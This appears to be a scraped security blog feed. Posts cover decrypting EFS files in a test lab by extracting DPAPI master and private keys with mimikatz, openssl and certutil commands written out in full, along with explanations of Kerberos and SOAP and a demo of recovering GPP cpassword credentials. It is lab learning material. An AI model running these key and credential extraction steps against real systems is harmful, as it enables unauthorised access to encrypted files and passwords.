<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5qmTNIFmdVQo4Jb7k9xO8rP6jntDEhSn9_h1pgCwc5WHKI7pfYq77sTFMwzDKHl2dVMYavVRN26JSV9oXFzZuS6jONkLoiRwgwGiizVo625Tq2_LB0r9XiMRiuLdl02S1esAZuAMd99qG/s1600/4_masterkey+decrypted+-+with+bruteforce.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5qmTNIFmdVQo4Jb7k9xO8rP6jntDEhSn9_h1pgCwc5WHKI7pfYq77sTFMwzDKHl2dVMYavVRN26JSV9oXFzZuS6jONkLoiRwgwGiizVo625Tq2_LB0r9XiMRiuLdl02S1esAZuAMd99qG/s400/4_masterkey+decrypted+-+with+bruteforce.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Master Key</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVJq2BON_78qC_Z4JDgwnjli6QTZxus_XwdQA2drF0HZZ98PQrmnvKUdy0vMWjWUmrmGBcxujKrXTJzM8_ZKCIq1642FWDT8-4g1_9WqidKeabon7IVFgSci5oIuM1Xb9kndajnXt-gt-b/s1600/5_extracting+private+key.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVJq2BON_78qC_Z4JDgwnjli6QTZxus_XwdQA2drF0HZZ98PQrmnvKUdy0vMWjWUmrmGBcxujKrXTJzM8_ZKCIq1642FWDT8-4g1_9WqidKeabon7IVFgSci5oIuM1Xb9kndajnXt-gt-b/s400/5_extracting+private+key.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypting Private key with master key</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivw4-SLFg5-ZDlmH7D9XXn6aMUmyNwWlMjuIJBqtT9AIhFzHzbkrp-dvChl1geJqalBMjncIKiDcZJ83apF5_RZ2xnTe8bGIzC1qE3QwDLUl8x5KpOGFVPVTcBX41-3lrgZscxd7djbfab/s1600/6_private+key+extracted+in+file.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivw4-SLFg5-ZDlmH7D9XXn6aMUmyNwWlMjuIJBqtT9AIhFzHzbkrp-dvChl1geJqalBMjncIKiDcZJ83apF5_RZ2xnTe8bGIzC1qE3QwDLUl8x5KpOGFVPVTcBX41-3lrgZscxd7djbfab/s400/6_private+key+extracted+in+file.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Export private key to .pvk file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O2WaSeYxAc-GOnaXfrS_q5wYdVD7lBhtiE-JX2SphBhYB6D4z75PO5lguUa_BAvMXDcCy0TEhPXr7hPoq76aPwPO3PXOARC31yS-7SjxxizXRcVrulSIHW8v7oOPdD4h8rFMfEk3yTBz/s1600/7_Certificate+Generation.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O2WaSeYxAc-GOnaXfrS_q5wYdVD7lBhtiE-JX2SphBhYB6D4z75PO5lguUa_BAvMXDcCy0TEhPXr7hPoq76aPwPO3PXOARC31yS-7SjxxizXRcVrulSIHW8v7oOPdD4h8rFMfEk3yTBz/s400/7_Certificate+Generation.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Extracting Certificate</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmg33ZzmpaUcmqfDtaagsWGm4dByACUR1pDYwkCnluPdBNIoj5C2xShH7Q9cCQ5RpqnyKVeMACQP0p6Y6lJL9hfuwGn9YZ94RsURZ6CmA37Yif7orv_xP7R0eMX0eu-VofxWFns0Ps_w2w/s1600/7_certutil+-+import+pfx+and+open+confidential+file.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmg33ZzmpaUcmqfDtaagsWGm4dByACUR1pDYwkCnluPdBNIoj5C2xShH7Q9cCQ5RpqnyKVeMACQP0p6Y6lJL9hfuwGn9YZ94RsURZ6CmA37Yif7orv_xP7R0eMX0eu-VofxWFns0Ps_w2w/s400/7_certutil+-+import+pfx+and+open+confidential+file.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Importing Certificate and Decrypted EFS encrypted file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u><br /></u></b>
<b><u>Path Details : (Reference : <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&app=Excel">Link</a> )</u></b><br />
<br />
Public Key Path :<br />
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D0180B88439A31CB850E1AAF6091B6006C0F2E9F<br />
<br />
O/P = D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der<br />
<br />
Private Key Path :<br />
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7<br />
<br />
O/P = b9fd6a85-6138-4a2b-98be-3acb31f7779b<br />
<br />
Confirm Private Key and get master key requires Path :<br />
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3064908807-4107569833-3502535929-1000<br />
<br />
O/P = {9d684db5-a8a9-4193-b364-5c270f321408}<br />
<br />
<br />
<br />
<b><u>All Required Keys :</u></b><br />
<br />
Public Key - D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der<br />
<br />
Private Key - b9fd6a85-6138-4a2b-98be-3acb31f7779b<br />
<br />
Master Key - {9d684db5-a8a9-4193-b364-5c270f321408}<br />
<br />
<br />
<u><b>Key Extraction :</b></u><br />
<u>Extracting Public Keys : (Stored in .DER file )</u><br />
<br />
mimikatz # crypto::system /file:"C:\Users\admin\AppData\Roaming\Microsoft\System<br />
Certificates\My\Certificates\D0180B88439A31CB850E1AAF6091B6006C0F2E9F" /export<br />
<br />
<u>Extracting Private Keys :</u><br />
<br />
mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\<br />
S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_<br />
e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7"<br />
<u><br /></u>
<u>Extracting Master Keys :</u><br />
<br />
mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protec<br />
t\S-1-5-21-3064908807-4107569833-3502535929-1000\9d684db5-a8a9-4193-b364-5c270f3<br />
21408"<br />
<br />
<u>Decrypt Master Keys : ( Password Required )</u><br />
<br />
mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protec<br />
t\S-1-5-21-3064908807-4107569833-3502535929-1000\9d684db5-a8a9-4193-b364-5c270f3<br />
21408" /password:test@123<br />
<u><br /></u>
<u>Decrypt Private Keys : (Store in .pvk file)</u><br />
<br />
mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\<br />
S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_<br />
e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7" /masterkey:0f2d0b68ebd591f4feab3366a947672<br />
d0886dc6a<br />
<br />
<br />
<b><u>Building the PFX - This requires OpenSSL v 1.x</u></b><br />
<b><u><br /></u></b>
Download from : <a href="http://slproweb.com/download/Win32OpenSSL_Light-1_1_0c.exe">Link</a><br />
<br />
openssl x509 -inform DER -outform PEM -in C:\OpenSSL-Win32\D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der -out C:\OpenSSL-Win32\public.pem<br />
<br />
openssl rsa -inform PVK -outform PEM -in C:\OpenSSL-Win32\raw_exchange_capi_0_b9fd6a85-6138-4a2b-98be-3acb31f7779b.pvk -out C:\OpenSSL-Win32\private.pem<br />
<br />
openssl pkcs12 -in C:\OpenSSL-Win32\public.pem -inkey C:\OpenSSL-Win32\private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\OpenSSL-Win32\cert.pfx<br />
<br />
<br />
<br />
<u><b>Importing Certificate :</b></u><br />
<br />
certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot<br />
<br />
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
Reference :https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files<br />
<br />
I know its already available but wanted to replicate it on my test environment!<br />
<br />
Hope this is helpful.<br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com2tag:blogger.com,1999:blog-6767655042968972948.post-12816177887957108682017-01-15T05:15:00.000-08:002017-01-28T04:55:36.389-08:00Quick Reference<div dir="ltr" style="text-align: left;" trbidi="on">
Hi All,<br />
<br />
Adding my updated quick reference slides on following topics :<a href="https://drive.google.com/open?id=0B4fmHoqW8qjTSjIwSXhCXzVOSUk"> </a><a href="https://drive.google.com/open?id=0B4fmHoqW8qjTSjIwSXhCXzVOSUk">Quick Reference v0.3</a><br />
<br />
<ol style="text-align: left;">
<li>Law systems</li>
<li>Intellectual Property Law (IPL)</li>
<li>International Issues</li>
<li>Safe Harbor</li>
<li>Wassenaar Arrangement</li>
<li>US Laws</li>
<li>Risk Analysis Types</li>
<li>Asset Types</li>
</ol>
<div>
<br /></div>
<div>
21-01-2017 </div>
<div>
New slides on following topics,</div>
<div>
<ol style="text-align: left;">
<li>Information Classification</li>
<li>Data Management</li>
<li>Quality Assurance and Quality Control</li>
<li>Data Quality</li>
<li>International Standards</li>
<li>CISI</li>
<li>Degausser Devices</li>
<li>PGP - Pretty Good Privacy</li>
<li>TOGAF</li>
</ol>
</div>
<div>
<br />
28-01-2017<br />
<br />
<ol style="text-align: left;">
<li>Security models</li>
<li>Cryptography</li>
</ol>
</div>
<div>
<br /></div>
<div>
Hope this quick references will be helpful ! </div>
<div>
<br /></div>
<div>
Do let me know in case it needs to be updated. Thanks</div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com1tag:blogger.com,1999:blog-6767655042968972948.post-12148442496383285602016-12-21T11:14:00.000-08:002017-01-16T21:41:48.139-08:00Kerberos Working<div dir="ltr" style="text-align: left;" trbidi="on">
<b><u><br /></u></b>
<b><u>Kerberos Understanding</u></b><br />
<br />
<br />
Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. A free implementation of this protocol is available from the Massachusetts Institute of Technology<br />
<br />
<ol style="text-align: left;">
<li>Kerberos protocol has 3 key components - <br />- Client [ Users / Applications ]<br />- Services <br />- Key Distribution Centre (KDC)</li>
<li>Key Distribution Centre (KDC) key components -<br />- Ticket Granting Service (TGS)<br />- KDC Database<br />- Authentication Service<br /><b><u><br />Note : </u></b> Users/Applications/Services also known as <b>principle</b> Set of principle is called "<b>realm</b>"</li>
<li>Keys Used in Kerberos Authentication :<br />- <b>Secret Keys </b> : These keys are shared between KDC and Principle<br />- <b>Session Keys </b> : These keys are shared between client and services i.e. principles</li>
</ol>
<div>
Overall Workflow - Client needs to access email service</div>
<ul style="text-align: left;">
<li>Kerberos is single sign on technology</li>
<li>In Kerberos, client sends username to KDC</li>
<li>KDC in turn search for user in KDC database</li>
<li>If user found in KDC database, TGS creates a ticket with limited period of time and sent to client along with session key.</li>
<li>Now, if client wants to access email server, then it will create "Authenticator" message containing - Client name, IP Address, Time and encrypt it with session key (S1) provided by KDC</li>
<li>Client then sends this TGT + Authenticator encrypted with session key + Service that needs to be access (Mail service) and send it to KDC</li>
<li>KDC decrypts message, post confirmation KDC creates a "Service Ticket" and encrypts it with Service key.</li>
<li>Service ticket along with new session key (S2) is encrypted with (S1) and send it to client.</li>
<li>Client now has service ticket, however it cant be decrypted as it doesn't have service key.</li>
<li>Client encrypts authenticator with new session key (S2) and send it to Service (Email Service)</li>
<li>Once service receives message, it can decrypt the message with Service key and confirm the identity.</li>
<li>Client can have communication with service!</li>
</ul>
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnt0ysgZhhoK_J6Lam671mB6BEGs7ZBtxvJWnFTkwbZIk_tGhQb6zRhqAC477jZJw_fqR5xyiRnZxvTOyPpWA35FNl1GX9QKgjmQt47T0kmbnPKyLzXIGkac2jntxiVsTjwqmuQEleEI5S/s1600/1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnt0ysgZhhoK_J6Lam671mB6BEGs7ZBtxvJWnFTkwbZIk_tGhQb6zRhqAC477jZJw_fqR5xyiRnZxvTOyPpWA35FNl1GX9QKgjmQt47T0kmbnPKyLzXIGkac2jntxiVsTjwqmuQEleEI5S/s400/1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Kerberos Key Components</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnt0ysgZhhoK_J6Lam671mB6BEGs7ZBtxvJWnFTkwbZIk_tGhQb6zRhqAC477jZJw_fqR5xyiRnZxvTOyPpWA35FNl1GX9QKgjmQt47T0kmbnPKyLzXIGkac2jntxiVsTjwqmuQEleEI5S/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnt0ysgZhhoK_J6Lam671mB6BEGs7ZBtxvJWnFTkwbZIk_tGhQb6zRhqAC477jZJw_fqR5xyiRnZxvTOyPpWA35FNl1GX9QKgjmQt47T0kmbnPKyLzXIGkac2jntxiVsTjwqmuQEleEI5S/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq94W_HQq3cFQN5Cprsx2ShEJBNRJCwr_7wAeM1eiOanYnKxtYOEMxnKzCW-eWLiiWJxCzLZwkxRR7We23LDyaR9A00kbeB-QVUgTidBkTVllL87SymgBzUPcKOYhTih8AjfaIoxtfRM3z/s1600/2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq94W_HQq3cFQN5Cprsx2ShEJBNRJCwr_7wAeM1eiOanYnKxtYOEMxnKzCW-eWLiiWJxCzLZwkxRR7We23LDyaR9A00kbeB-QVUgTidBkTVllL87SymgBzUPcKOYhTih8AjfaIoxtfRM3z/s400/2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Kerberos Overall Flow - Client wants to access email service</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Below are some of the best links I came across for understanding Kerberos :<br />
<a href="https://www.youtube.com/watch?v=KD2Q-2ToloE">Link 1</a><br />
<a href="https://www.youtube.com/watch?v=kp5d8Yv3-0c&t=327s">Link 2</a><br />
<a href="https://www.blackhat.com/docs/us-15/materials/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection-wp.pdf">Link 3 ( Blackhat )</a><br />
<br />
Potential weaknesses in Kerberos :<br />
<br />
<ol style="text-align: left;">
<li>KDC can be single point of failure</li>
<li>Secret keys are stored temporarily on users workstations </li>
<li>Session keys either reside in cache or in key table </li>
<li>Kerberos is vulnerable to password guessing - KDC doesn't have any mechanism to detect bruteforce attempts.</li>
<li>Network traffic is not protected if encryption is not enabled</li>
<li>Too short keys - vulnerable to bruteforce</li>
<li>Kerberos needs all client and server clock to be synchronised</li>
</ol>
<br />
<br />
<br />
Hope this helps! Thanks for visiting!<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-31197196493261256812016-11-16T11:12:00.002-08:002017-01-16T21:42:14.178-08:00SOAP (Simple Object Access Protocol ) - Understanding<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
SOAP - Simple Object Access Protocol<br />
<br />
<br />
<ol style="text-align: left;">
<li>Consider a scenario where Application A needs to communicate with Application B</li>
<li>Application A needs to get status of credit card from Application B</li>
<li>In this case, web service will be created on application B</li>
<li>Irrespective of underlying technology, Application A will be able to send SOAP requests containing (Credit card no.) to Application B web service.</li>
<li>Application B web service will process request and generate SOAP response which will be sent to Application A</li>
</ol>
<div>
<br /></div>
<div>
Refer below diagram :</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7nMFIwp_VPxXHP4DZh_5krF_RkLahPm3L_90eegHZYAOXvKfidmKPLyKCN8q8GGe2KBbwsFEq3Wzsu6EnG6WuYwJJiQbvSdbjKZlBj-dKDwClO23tVBrGShYg8hgbYeohS-d8a1BNJEKI/s1600/SOAP_1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7nMFIwp_VPxXHP4DZh_5krF_RkLahPm3L_90eegHZYAOXvKfidmKPLyKCN8q8GGe2KBbwsFEq3Wzsu6EnG6WuYwJJiQbvSdbjKZlBj-dKDwClO23tVBrGShYg8hgbYeohS-d8a1BNJEKI/s400/SOAP_1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Below are actual SOAP request and response calls captured in Burpsuite :<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMDsw7kSBCX2bj0ZndGob2nFgfM4dzk0vPuxzECL-H1ueta0hdpEe9zAvfL_0OFOYC4ZHYHOQqOu5ec4T4PlMpU3IfqIVfPOyfxHqXwgONtXx2ZMUFzAqReleoPRB0HD2GrLK1qWYe0Ag/s1600/server+request3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQMDsw7kSBCX2bj0ZndGob2nFgfM4dzk0vPuxzECL-H1ueta0hdpEe9zAvfL_0OFOYC4ZHYHOQqOu5ec4T4PlMpU3IfqIVfPOyfxHqXwgONtXx2ZMUFzAqReleoPRB0HD2GrLK1qWYe0Ag/s400/server+request3.png" width="360" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<a href="https://www.youtube.com/watch?v=mKjvKPlb1rA">SOAP - Youtube Video</a></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com1tag:blogger.com,1999:blog-6767655042968972948.post-48025313649450930532016-10-21T03:19:00.003-07:002016-10-21T03:19:50.008-07:00Group Policy Misconfiguration - Encrypted password (cpassword)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I was simulating in my active directory test environment on group policy misconfiguration issue and hence posting it here for reference.<br />
<br />
If local admin users are pushed via GPO, Domain logged in users can just search for "Group.XML" or ".XML" file on their local system.<br />
<br />
This files contains AES encrypted password, and fortunately Microsoft has published AES keys used to encrypt this password <a href="https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx">here</a><br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtmpe6BBAQn_0LpuIhtpX8fnZGCiU9gXzfddOe6jPQPIx0rZPvbU3rkC2USom1DEr29TnL8ZPfQXpmAb8LNMivXC8XFmCOmTEwgHJ86_F8k-I-77kUpoxsgwwL5_EqyNxmrtqsHLsl6Nnk/s1600/Pushing+Local+admin+via+gpo_5.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtmpe6BBAQn_0LpuIhtpX8fnZGCiU9gXzfddOe6jPQPIx0rZPvbU3rkC2USom1DEr29TnL8ZPfQXpmAb8LNMivXC8XFmCOmTEwgHJ86_F8k-I-77kUpoxsgwwL5_EqyNxmrtqsHLsl6Nnk/s400/Pushing+Local+admin+via+gpo_5.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Push "localadmin" user via GPO - It's damn simple, just have to add user in Group Policy Management Editor > Computer Configuration > Preferences > Local User and Groups<br />
<br />
Once you create localadmin user via GPO, it shows this alert - Password is discoverable<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VJTeOtF0hHJSWyT5kQCjX0D8XhuSIiyR7OFsJn-_D7eIt4XOu2JxVwQKiOrqwdhELULX3xIzqJ7q8axLbEjWuPweveTUVuxhKnktvH5pv7rKPL1HVDwvd3LUo3lslYhCQ-PEBziUNowE/s1600/Pushing+Local+admin+via+gpo.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VJTeOtF0hHJSWyT5kQCjX0D8XhuSIiyR7OFsJn-_D7eIt4XOu2JxVwQKiOrqwdhELULX3xIzqJ7q8axLbEjWuPweveTUVuxhKnktvH5pv7rKPL1HVDwvd3LUo3lslYhCQ-PEBziUNowE/s400/Pushing+Local+admin+via+gpo.PNG" width="400" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VJTeOtF0hHJSWyT5kQCjX0D8XhuSIiyR7OFsJn-_D7eIt4XOu2JxVwQKiOrqwdhELULX3xIzqJ7q8axLbEjWuPweveTUVuxhKnktvH5pv7rKPL1HVDwvd3LUo3lslYhCQ-PEBziUNowE/s1600/Pushing+Local+admin+via+gpo.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Once user is created, you can go to any workstation in your domain and just connect to domain controller via \\IP and search for .XML file.<br />
<br />
We can clearly see encrypted password in file Groups.XML file.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCmApymXQEeKrrz_BrP1p7QGLHqDgiOpi-HnONn-xnJ9yC87MIplNQ2_4ucnDdU3eDa9sGVNLDQZeCvqZ4c_9si35Jp9ABTNAeia19v3HNZucf8yyHgnvBlGovh2m2XBzoqJ2FITIXw-0/s1600/Pushing+Local+admin+via+gpo_2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCmApymXQEeKrrz_BrP1p7QGLHqDgiOpi-HnONn-xnJ9yC87MIplNQ2_4ucnDdU3eDa9sGVNLDQZeCvqZ4c_9si35Jp9ABTNAeia19v3HNZucf8yyHgnvBlGovh2m2XBzoqJ2FITIXw-0/s400/Pushing+Local+admin+via+gpo_2.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I suppose, solution for this is pretty simple, you just have to remove user from control panel on domain controller.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s1600/Pushing+Local+admin+via+gpo_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s400/Pushing+Local+admin+via+gpo_3.PNG" width="400" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s1600/Pushing+Local+admin+via+gpo_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNT00YLfhHhTkVEEL9tbse2e9EHrNaMGNM5Up5B-WPkMh72rYHxGahhQ4sfsQtU2NxpudJxRJf-Mkli1O0mq6cZ3c6MT8qn22JNR3x-wI0cRMOvseIFn2l03Z7EKNpmU4-HcHKEF_BgWXt/s1600/Pushing+Local+admin+via+gpo_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Extracting password for "localadmin" using powershell script<br />
<br />
You can find the script <a href="http://obscuresecurity.blogspot.in/2012/05/gpp-password-retrieval-with-powershell.html">here</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvCmFRxv7kf9n_n36Skrbbxwf87e61t7hhZUaLoyRIpD6HZJKQAEsTbc2wIFCS6Ef1L6l0TmJ8jcM8REu1U233hYjeuMmz5EHDGhsP-HR48VxqRvZxsAWpq49m1HsPlAU7N6WJ47iiJiZn/s1600/Pushing+Local+admin+via+gpo_4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvCmFRxv7kf9n_n36Skrbbxwf87e61t7hhZUaLoyRIpD6HZJKQAEsTbc2wIFCS6Ef1L6l0TmJ8jcM8REu1U233hYjeuMmz5EHDGhsP-HR48VxqRvZxsAWpq49m1HsPlAU7N6WJ47iiJiZn/s400/Pushing+Local+admin+via+gpo_4.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I know its pretty simple to execute, but all I wanted to check is actual AD configuration!<br />
<br />
Thanks.<br />
<br /></div>
